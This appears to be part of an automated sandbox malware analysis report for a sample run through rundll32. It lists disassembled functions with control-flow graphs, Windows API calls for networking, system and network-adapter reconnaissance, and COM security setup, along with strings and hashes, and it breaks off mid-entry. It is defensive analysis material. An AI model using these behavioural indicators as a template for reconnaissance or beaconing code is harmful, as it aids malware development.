                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7EDF536B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Ios_base_dtorconnectgethostbynamerecvsendsocketstd::ios_base::_std::ios_base::clear
                  • String ID: -P
                  • API String ID: 3660264722-3391753047
                  • Opcode ID: 6930f6e01cb61905e6045731ee247c05696b23be9fb31e3b1f51668776d4593b
                  • Instruction ID: 9ebce683df3545cb371b8f7abca2b4512f8c99229e7d40323bfa3bef6a106474
                  • Opcode Fuzzy Hash: 6930f6e01cb61905e6045731ee247c05696b23be9fb31e3b1f51668776d4593b
                  • Instruction Fuzzy Hash: EB739CB8E052688FCB65CF18C990B99BBB1BF88304F1081DAD85DA7355DB35AE85CF50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 6495 7eded200-7eded229 call 7edae060 6498 7eded234-7eded238 6495->6498 6499 7eded27e-7eded2cc call 7eda1cf0 6498->6499 6500 7eded23a-7eded27c 6498->6500 6505 7eded2ce-7eded2d3 6499->6505 6506 7eded2d8-7eded386 6499->6506 6500->6498 6507 7ededca4-7ededca9 6505->6507 6508 7eded391-7eded395 6506->6508 6509 7eded3dc-7eded4ee call 7eda1f00 CoInitializeSecurity 6508->6509 6510 7eded397-7eded3da 6508->6510 6514 7eded4f9-7eded4fd 6509->6514 6510->6508 6515 7eded4ff-7eded542 6514->6515 6516 7eded544-7eded5a1 call 7eda1ed0 6514->6516 6515->6514 6521 7eded5a7-7eded664 6516->6521 6522 7eded702-7eded7ad 6516->6522 6523 7eded66f-7eded673 6521->6523 6524 7eded7b8-7eded7bc 6522->6524 6527 7eded6ba-7eded6fd call 7eda1ea0 6523->6527 6528 7eded675-7eded6b8 6523->6528 6525 7eded7be-7eded801 6524->6525 6526 7eded803-7eded865 6524->6526 6525->6524 6534 7eded9ac-7ededa69 6526->6534 6535 7eded86b-7eded90e 6526->6535 6527->6507 6528->6523 6536 7ededa74-7ededa78 6534->6536 6543 7eded919-7eded91d 6535->6543 6538 7ededabf-7ededb1e call 7eda1c60 CoSetProxyBlanket 6536->6538 6539 7ededa7a-7ededabd 6536->6539 6547 7ededb24-7ededc07 6538->6547 6548 7ededca2 6538->6548 6539->6536 6545 7eded91f-7eded962 6543->6545 6546 7eded964-7eded9a7 call 7eda1ea0 6543->6546 6545->6543 6546->6507 6555 7ededc12-7ededc16 6547->6555 6548->6507 6556 7ededc5d-7ededca0 call 7eda1ea0 6555->6556 6557 7ededc18-7ededc5b 6555->6557 6556->6507 6557->6555
                  APIs
                  • CoInitializeSecurity.COMBASE(00000003,00000000,00000000,00000000), ref: 7EDED42A
                  • CoSetProxyBlanket.COMBASE(00000000,00000000,?,7EE2C3DC,00000000,00000001,7EE2C3CC,7EE40CB8), ref: 7EDEDB10
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: BlanketInitializeProxySecurity
                  • String ID: $,$2$U$k$w
                  • API String ID: 257369873-3040684795
                  • Opcode ID: 880a54598cef5c9412839cee8bac430958607307211973de613ef6ef78911689
                  • Instruction ID: 827fe6ab56ba879d3df58ec764c3e048592f03139d13592f9cd7c963d6ad2ee3
                  • Opcode Fuzzy Hash: 880a54598cef5c9412839cee8bac430958607307211973de613ef6ef78911689
                  • Instruction Fuzzy Hash: 27623434A14258CADB25CFA4C850BDEB7B2FF99300F1084A9D50DAB390EB755E85CF5A

                  Control-flow Graph

                  APIs
                  • PathIsDirectoryW.SHLWAPI(?), ref: 7EDC8AC0
                  • GetDialogBaseUnits.USER32 ref: 7EDC90FD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: BaseDialogDirectoryPathUnits
                  • String ID: :FailedAddIndicator$DD?ljh$L$\$ty
                  • API String ID: 4072447014-873945179
                  • Opcode ID: e8f088ebe698f1027cda7567c4aedce9ef205204b8e9dba7f7fc72070dd10a35
                  • Instruction ID: 8b64c08b93288addd3fae5f632d5a8728957ed8b23ff32161efb0ea13547142a
                  • Opcode Fuzzy Hash: e8f088ebe698f1027cda7567c4aedce9ef205204b8e9dba7f7fc72070dd10a35
                  • Instruction Fuzzy Hash: FF429F79904268CFCB15CF6AC890BEDBBBABB49300F14899AD449E7365D7309A81CF51

                  Control-flow Graph

                  APIs
                  • PathIsDirectoryW.SHLWAPI(?), ref: 7EDC8AC0
                  • GetDialogBaseUnits.USER32 ref: 7EDC90FD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: BaseDialogDirectoryPathUnits
                  • String ID: :FailedAddIndicator$DD?ljh$L$\$ty
                  • API String ID: 4072447014-873945179
                  • Opcode ID: aa9d8bac64e5fa18aaab824468c90f7f3bacacc936dbae2466d0cb17a01af17e
                  • Instruction ID: 76b8458fa1065417dd4889d1850b8de43ce89a3f5f109ae615b1db5512b1309c
                  • Opcode Fuzzy Hash: aa9d8bac64e5fa18aaab824468c90f7f3bacacc936dbae2466d0cb17a01af17e
                  • Instruction Fuzzy Hash: 6E329079904268CFCB15CF69C890BEEBBBABF49300F1489DAD449E7265D7309A81CF51

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 6701 7edfe7ce-7edfe7d4 6702 7edfe7d6-7edfe7e0 6701->6702 6703 7edfe7e2 6701->6703 6704 7edfe7ec-7edfe7fc 6702->6704 6703->6704 6705 7edfe7fe-7edfe808 6704->6705 6706 7edfe80a 6704->6706 6707 7edfe814-7edfe8af call 7ee02f90 * 2 6705->6707 6706->6707 6712 7edfe8c5-7edfe8c8 6707->6712 6713 7edfe8b1-7edfe8c3 6707->6713 6714 7edfe8d0-7edfeba3 call 7ee02f90 * 3 call 7ede60e0 6712->6714 6713->6714 6728 7edfeba9-7edfebe2 6714->6728 6729 7edfed64-7edfed6e 6714->6729 6732 7edfebe4-7edfebf0 6728->6732 6733 7edfebf2-7edfebfc 6728->6733 6730 7edfed7c 6729->6730 6731 7edfed70-7edfed7a 6729->6731 6736 7edfed86-7edfeda3 6730->6736 6731->6736 6732->6733 6734 7edfebfe 6732->6734 6735 7edfec08-7edfec17 6733->6735 6734->6735 6737 7edfec19-7edfec23 6735->6737 6738 7edfec25 6735->6738 6739 7edfedbe 6736->6739 6740 7edfeda5 6736->6740 6741 7edfec2f-7edfec3b 6737->6741 6738->6741 6744 7edfedc8-7edfedd4 6739->6744 6742 7edfeda7-7edfedb0 6740->6742 6743 7edfedb2-7edfedbc 6740->6743 6747 7edfec3d-7edfec47 6741->6747 6748 7edfec49 6741->6748 6742->6739 6742->6743 6743->6744 6745 7edfee46-7edff20d call 7ee02f90 GetDialogBaseUnits call 7edb0670 call 7edcb9e0 GetPEB 6744->6745 6746 7edfedd6-7edfee42 call 7ee02f90 6744->6746 6772 7edff213-7edff2bc 6745->6772 6746->6745 6750 7edfec53-7edfec5c 6747->6750 6748->6750 6753 7edfec5e-7edfec7c 6750->6753 6754 7edfec8a 6750->6754 6753->6754 6757 7edfec7e-7edfec88 6753->6757 6756 7edfec94-7edfeca2 6754->6756 6759 7edfecd5-7edfecde 6756->6759 6760 7edfeca4-7edfecd0 6756->6760 6757->6756 6762 7edfed5f 6759->6762 6763 7edfece0-7edfece6 6759->6763 6760->6762 6762->6745 6763->6762 6766 7edfece8-7edfed5c 6763->6766 6766->6762 6775 7edff3f3-7edff429 6772->6775 6776 7edff2c2-7edff2cb 6772->6776 6775->6772 6777 7edff42f 6775->6777 6778 7edff2d1-7edff2f3 6776->6778 6779 7edff439-7edff460 6777->6779 6778->6775 6780 7edff2f9-7edff329 6778->6780 6785 7edff479 6779->6785 6786 7edff462-7edff46b 6779->6786 6781 7edff333-7edff359 6780->6781 6783 7edff35b-7edff367 6781->6783 6784 7edff369-7edff383 6781->6784 6787 7edff385-7edff38f 6783->6787 6784->6781 6784->6787 6789 7edff483-7edff487 6785->6789 6786->6785 6788 7edff46d-7edff477 6786->6788 6790 7edff3ee 6787->6790 6791 7edff391-7edff3ec 6787->6791 6788->6789 6792 7edff489 6789->6792 6793 7edff4a0 6789->6793 6790->6778 6791->6779 6794 7edff48b-7edff492 6792->6794 6795 7edff494-7edff49e 6792->6795 6796 7edff4aa-7edff5fd GetCommandLineW call 7edbf220 ExitProcess 6793->6796 6794->6793 6794->6795 6795->6796
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /%$:FailedAddIndicator$DD?ljh$QP>
                  • API String ID: 0-2538035616
                  • Opcode ID: 3f26c8bdf1199989385c6339da067b05e0061c656f3b518d3d1aa479b0d5ff20
                  • Instruction ID: a8fd0a05a200d726c7ca6a76c7f35fdbcc8b539216602aa1a2f564677ce86c02
                  • Opcode Fuzzy Hash: 3f26c8bdf1199989385c6339da067b05e0061c656f3b518d3d1aa479b0d5ff20
                  • Instruction Fuzzy Hash: B7327778904268CFDB25CF69C890BEDBBB5BF89300F1085DAE859B7255DB349A80CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /%$:FailedAddIndicator$DD?ljh$QP>
                  • API String ID: 0-2538035616
                  • Opcode ID: 42472a4b884ac5a0bdf73164bd279bb819a3eeada45dea156d65948d6c6937b0
                  • Instruction ID: e29c3386bdd29ace9e0d13a7b4dc5a83a228e6d811230dd3de8c840fc2ca4b98
                  • Opcode Fuzzy Hash: 42472a4b884ac5a0bdf73164bd279bb819a3eeada45dea156d65948d6c6937b0
                  • Instruction Fuzzy Hash: 22F11478A04268CFDB25CF19C890BE9BBB6BF49314F1085DAD859B7345DB70AA80CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /%$:FailedAddIndicator$DD?ljh$QP>
                  • API String ID: 0-2538035616
                  • Opcode ID: 3e2b5a64aa7e1f5c22e7c0159e112a8770665372318adfd7744547cbf3f033ca
                  • Instruction ID: 0e1157960e4ce7a98ff2d08d0ec2083bd00c8b27d0b318386995026f3ecaaa24
                  • Opcode Fuzzy Hash: 3e2b5a64aa7e1f5c22e7c0159e112a8770665372318adfd7744547cbf3f033ca
                  • Instruction Fuzzy Hash: 23E13579A04268CFDB29CF29C890BEDB7B6BF49304F1085DAD849A7355DB349A80CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /%$:FailedAddIndicator$DD?ljh$QP>
                  • API String ID: 0-2538035616
                  • Opcode ID: 286977b39a567d2d0b2c62dbdc0f06074b51f0d7e411273b225be664caa5ee0c
                  • Instruction ID: 324ca9fdba571c5111c022dc6cbc5b688a4be62dfcc3f8f98e6cccb84e80d142
                  • Opcode Fuzzy Hash: 286977b39a567d2d0b2c62dbdc0f06074b51f0d7e411273b225be664caa5ee0c
                  • Instruction Fuzzy Hash: E7E12879A04268CFDB29CF29C880BEDB7B6BF89304F1085DAD449A7355DB749A80CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .$:FailedAddIndicator$interrupted
                  • API String ID: 0-47767692
                  • Opcode ID: d145482061f4a5605b2ac764889a1bde2ab41859da558ff6b59a587f71c55de4
                  • Instruction ID: cbd3523df334e85f200ab240c5342f14ea5d855665c10e137fc9ea23bf2fb653
                  • Opcode Fuzzy Hash: d145482061f4a5605b2ac764889a1bde2ab41859da558ff6b59a587f71c55de4
                  • Instruction Fuzzy Hash: 34729279D0436CCADB15CF6AC8907ADBBFABF48300F248999E449E7255E7385A80CF51
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEF0000, based on PE: true
                  • Associated: 0000000D.00000002.2509662436.000000006CEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2509808197.000000006CF9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2509850199.000000006CFC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2509948306.000000006D229000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2510090279.000000006D58F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2510119917.000000006D591000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_6cef0000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .$G$J$J$K$y
                  • API String ID: 0-3686787964
                  • Opcode ID: 64305ed8aeffdb724379985bb63ca2d9173c3a9f69351375dbb5c7d37cc30cc3
                  • Instruction ID: 6c1ab4e23bbac2852b3721838611396309833c9bd60475c208340ba2f51e544d
                  • Opcode Fuzzy Hash: 64305ed8aeffdb724379985bb63ca2d9173c3a9f69351375dbb5c7d37cc30cc3
                  • Instruction Fuzzy Hash: A9E189B0F142589EDB54CFA9C8807EEBBB1BF8A304F10819AD408A7351E7359A88CB55
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$GlobalMemoryStatus
                  • String ID: @
                  • API String ID: 2185283323-2766056989
                  • Opcode ID: 77aec53b09abd959fe48d256b3cc1354ce63da7bfabbbb50b63ba32e9ab2a368
                  • Instruction ID: cb121680b60ab2fe522a996592ed48983227ffd7d5846998dd4a5427718c616a
                  • Opcode Fuzzy Hash: 77aec53b09abd959fe48d256b3cc1354ce63da7bfabbbb50b63ba32e9ab2a368
                  • Instruction Fuzzy Hash: E371B0B8E042599FCB14CF99C491AEEFBB2BF48304F208199D955BB345C735AA41CF94
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1$2$N/A$S$^
                  • API String ID: 0-48430985
                  • Opcode ID: 98ce15cc7d1441e6fc40f4bf13247e3c02fdd8f35dd773256de451d49633eb0b
                  • Instruction ID: ce1213d75bdaae6ed4e0427f99fcbfe0e5458c65b3f20d7a63a0e53b6f260b10
                  • Opcode Fuzzy Hash: 98ce15cc7d1441e6fc40f4bf13247e3c02fdd8f35dd773256de451d49633eb0b
                  • Instruction Fuzzy Hash: 2B421378E04258CBDB59CFA8C880BDEB7B2FF88304F1085A9E509A7354EB745A85CF55
                  APIs
                  • GetComputerNameExA.KERNELBASE(?,?,?), ref: 7EDEC233
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ComputerName
                  • String ID: WORKGROUP
                  • API String ID: 3545744682-2380569353
                  • Opcode ID: 67752ea49c926436260a6a0fc17ab7abc36c92df73fb1e5057aa191ec0a63216
                  • Instruction ID: df84acd3341b435d0cb040e73fd84559236a8af34dcc315dfdefdbe1d21a1324
                  • Opcode Fuzzy Hash: 67752ea49c926436260a6a0fc17ab7abc36c92df73fb1e5057aa191ec0a63216
                  • Instruction Fuzzy Hash: 84B1CC78E042589FDB18CFA8C890BEDBBB2BF48304F208199D859B7345D730AA85CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: std::exception::exception
                  • String ID: L
                  • API String ID: 2807920213-2909332022
                  • Opcode ID: f6f5c35cbe7c11509aa9569a02c96254197cb58bca0c514bfcd18f38537469b7
                  • Instruction ID: d8d9dcdbbb2a5a0e26b0eec6f3d2df223b08829dbc80ccab9403c5f095ad9efd
                  • Opcode Fuzzy Hash: f6f5c35cbe7c11509aa9569a02c96254197cb58bca0c514bfcd18f38537469b7
                  • Instruction Fuzzy Hash: 1B0310B4D052689FDB25CB68CD84BDEBBB4AB48300F1085D9D509B7291DB746F88CFA1
                  APIs
                  • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7EDE8E87
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdaptersInfo
                  • String ID:
                  • API String ID: 3177971545-0
                  • Opcode ID: 3983a59c0f27dba1336da45a787170418fb04cf95da494751cd12825f78ba1c5
                  • Instruction ID: 534673dfd8ae4a54811a66df4c870fbc2479354d2ac75504df04f113e9c3e479
                  • Opcode Fuzzy Hash: 3983a59c0f27dba1336da45a787170418fb04cf95da494751cd12825f78ba1c5
                  • Instruction Fuzzy Hash: FCA29F78E052698FDB64CF58C894BDDBBB2BF89304F1081DAD849A7355DB30AA85CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "
                  • API String ID: 0-123907689
                  • Opcode ID: 5381468ef545f5c775b06fbf449305cf70e59f2e17390b140612d31607763634
                  • Instruction ID: 0e1412a4e8a5496d2059c41a190b5330b380d809577809d611ccafa20ab79f4c
                  • Opcode Fuzzy Hash: 5381468ef545f5c775b06fbf449305cf70e59f2e17390b140612d31607763634
                  • Instruction Fuzzy Hash: A8A22074D05258DFCB15DBA8C994BEEBBB1AF48300F1085D9D40AB7291DB349B88DFA1
                  APIs
                  • GetSystemInfo.KERNEL32(?), ref: 7EDE8917
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoSystem
                  • String ID:
                  • API String ID: 31276548-0
                  • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                  • Instruction ID: 9ad701c1d55d849a62d90bb5551037b301563d9c817f642b50889ed422a075e4
                  • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                  • Instruction Fuzzy Hash: 1A618E78E042599FCB08CF99D590AEDFBB2BF48304F24819AD815BB345D734AA42CF94

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 6804 7edb955a-7edb96d6 call 7ee01268 call 7edf00c0 call 7eda75e0 call 7eda83e0 call 7ede18d0 call 7ede3180 6821 7edb96d8-7edb96e2 6804->6821 6822 7edb96e4 6804->6822 6823 7edb96ee-7edb96f2 6821->6823 6822->6823 6824 7edb9700 6823->6824 6825 7edb96f4-7edb96fe 6823->6825 6826 7edb970a-7edb9716 6824->6826 6825->6826 6827 7edb992c-7edb9ab1 call 7eda6300 * 4 call 7ede9e70 call 7eda6300 * 2 call 7eddc4f0 6826->6827 6828 7edb971c-7edb9741 call 7ede3fa0 6826->6828 6870 7edb9ab6-7edb9adf 6827->6870 6833 7edb981c-7edb9825 6828->6833 6834 7edb9747-7edb9752 6828->6834 6833->6827 6837 7edb982b-7edb989c 6833->6837 6838 7edb9760 6834->6838 6839 7edb9754-7edb975e 6834->6839 6842 7edb989e-7edb98b0 6837->6842 6843 7edb98b2-7edb98b5 6837->6843 6840 7edb976a-7edb9773 6838->6840 6839->6840 6845 7edb9781 6840->6845 6846 7edb9775-7edb977f 6840->6846 6847 7edb98bd-7edb9908 call 7ee02f90 6842->6847 6843->6847 6849 7edb978b-7edb9797 6845->6849 6846->6849 6858 7edb990a-7edb9916 6847->6858 6859 7edb9918-7edb991a 6847->6859 6852 7edb9799-7edb97d8 6849->6852 6853 7edb9817 6849->6853 6856 7edb97da-7edb97ee 6852->6856 6857 7edb97f0-7edb97fc 6852->6857 6853->6827 6862 7edb9802-7edb9813 6856->6862 6857->6862 6860 7edb9921-7edb9928 6858->6860 6859->6860 6860->6827 6862->6853 6872 7edb9ae1 6870->6872 6873 7edb9af7 6870->6873 6874 7edb9aeb-7edb9af5 6872->6874 6875 7edb9ae3-7edb9ae9 6872->6875 6876 7edb9b01-7edb9b05 6873->6876 6874->6876 6875->6873 6875->6874 6877 7edb9b1b 6876->6877 6878 7edb9b07 6876->6878 6879 7edb9b25-7edb9b31 6877->6879 6880 7edb9b09-7edb9b0d 6878->6880 6881 7edb9b0f-7edb9b19 6878->6881 6882 7edb9c1c-7edb9e2d IsValidCodePage lstrlenA GetWindowTextLengthA 6879->6882 6883 7edb9b37-7edb9bae call 7ee02f90 * 2 6879->6883 6880->6877 6880->6881 6881->6879 6895 7edb9e37-7edb9ead 6882->6895 6892 7edb9bb0-7edb9bc2 6883->6892 6893 7edb9bc4-7edb9bd2 6883->6893 6896 7edb9bd8-7edb9c16 call 7ee02f90 6892->6896 6893->6896 6896->6882
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .$:FailedAddIndicator$interrupted$s
                  • API String ID: 0-1308746808
                  • Opcode ID: 3f2779ed1485918c70272532f5c4c52df25ccaf98dbe461983855cd1fc6e1101
                  • Instruction ID: 474fad5718d0f188fb3a5f011fbe4d472e150864c055711e3b2568908205ecf1
                  • Opcode Fuzzy Hash: 3f2779ed1485918c70272532f5c4c52df25ccaf98dbe461983855cd1fc6e1101
                  • Instruction Fuzzy Hash: 9002AE79D043A8CADB14CF69C8947ADBBB6BB48300F2089D9D40AF7256E7785B80CF51
                  APIs
                  • IsValidCodePage.KERNEL32(17BCCBAC), ref: 7EDB9C77
                  • lstrlenA.KERNEL32(?), ref: 7EDB9CB8
                  • GetWindowTextLengthA.USER32(?), ref: 7EDB9D93
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CodeLengthPageTextValidWindowlstrlen
                  • String ID: :FailedAddIndicator$interrupted
                  • API String ID: 4184482251-3904394143
                  • Opcode ID: 1605dec5905d13055ab576614e17dc6c14391cc99669d85c06bff67d90804fa6
                  • Instruction ID: 2bd601c5e509038667f654abef7bacd13695c8ecc356196155b5637691113d8f
                  • Opcode Fuzzy Hash: 1605dec5905d13055ab576614e17dc6c14391cc99669d85c06bff67d90804fa6
                  • Instruction Fuzzy Hash: 28C17EB9D04258CFDB14CF69C9957ADBBFABB48300F208899E40AE7255EB345A84CF51
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: RPVQ(:$RQP9
                  • API String ID: 621844428-2947979775
                  • Opcode ID: 449cdf7af85a6850a2b859d582a910b1e6590d7990143a3278bf837e78d19170
                  • Instruction ID: d8a6e50f9b10615b18d238fb887b1034163af231b490dea54824d5c66d1f6c5f
                  • Opcode Fuzzy Hash: 449cdf7af85a6850a2b859d582a910b1e6590d7990143a3278bf837e78d19170
                  • Instruction Fuzzy Hash: F82190BAD00268CBCB14CF96C881AADB7BAFB48305F244959E415F7316D7309D40CF61
                  APIs
                  • CreateThread.KERNEL32(?,?,00000000,?,?,?,?,?,6CF5F30A,00000000,00000000,?,00000000,00000000,00000000,000000E5), ref: 6CEF11FE
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEF0000, based on PE: true
                  • Associated: 0000000D.00000002.2509662436.000000006CEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2509808197.000000006CF9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2509850199.000000006CFC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2509948306.000000006D229000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2510090279.000000006D58F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 0000000D.00000002.2510119917.000000006D591000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_6cef0000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread
                  • String ID:
                  • API String ID: 2422867632-0
                  • Opcode ID: f63af93a669a942de1f5ae3a2043a18d49d354450eca9fad240067c5be96da76
                  • Instruction ID: f974ccac8fcc27ea3121ddcc3f0850ab0501c6290fbba168a29ac72ee2c61d55
                  • Opcode Fuzzy Hash: f63af93a669a942de1f5ae3a2043a18d49d354450eca9fad240067c5be96da76
                  • Instruction Fuzzy Hash: FAF045B4604209AF8744DF99D890D5BB7B9EF8D350B10815DBC19C7350D631E911DBA5
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FocusWindow
                  • String ID: -R$1$1$2"$:FailedAddIndicator$DD?ljh$Lnotadirectory$[$a$f
                  • API String ID: 348293334-1882429083
                  • Opcode ID: c38cb7a2168b01c8dfc79bd9bcb6102a90d9bb7359e4a1c2eb51cca3547fdcfe
                  • Instruction ID: a28f049d28613222654c2c03848ab44b7879fa8af345d2fb1ac79698cef64618
                  • Opcode Fuzzy Hash: c38cb7a2168b01c8dfc79bd9bcb6102a90d9bb7359e4a1c2eb51cca3547fdcfe
                  • Instruction Fuzzy Hash: D6C2AD7990436CCADB04CFA6C8947EEBBB9BF48304F24889AE445F7269E7744981CF51
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, Offset: 7ED90000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_7ed90000_rundll32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ShellWindow
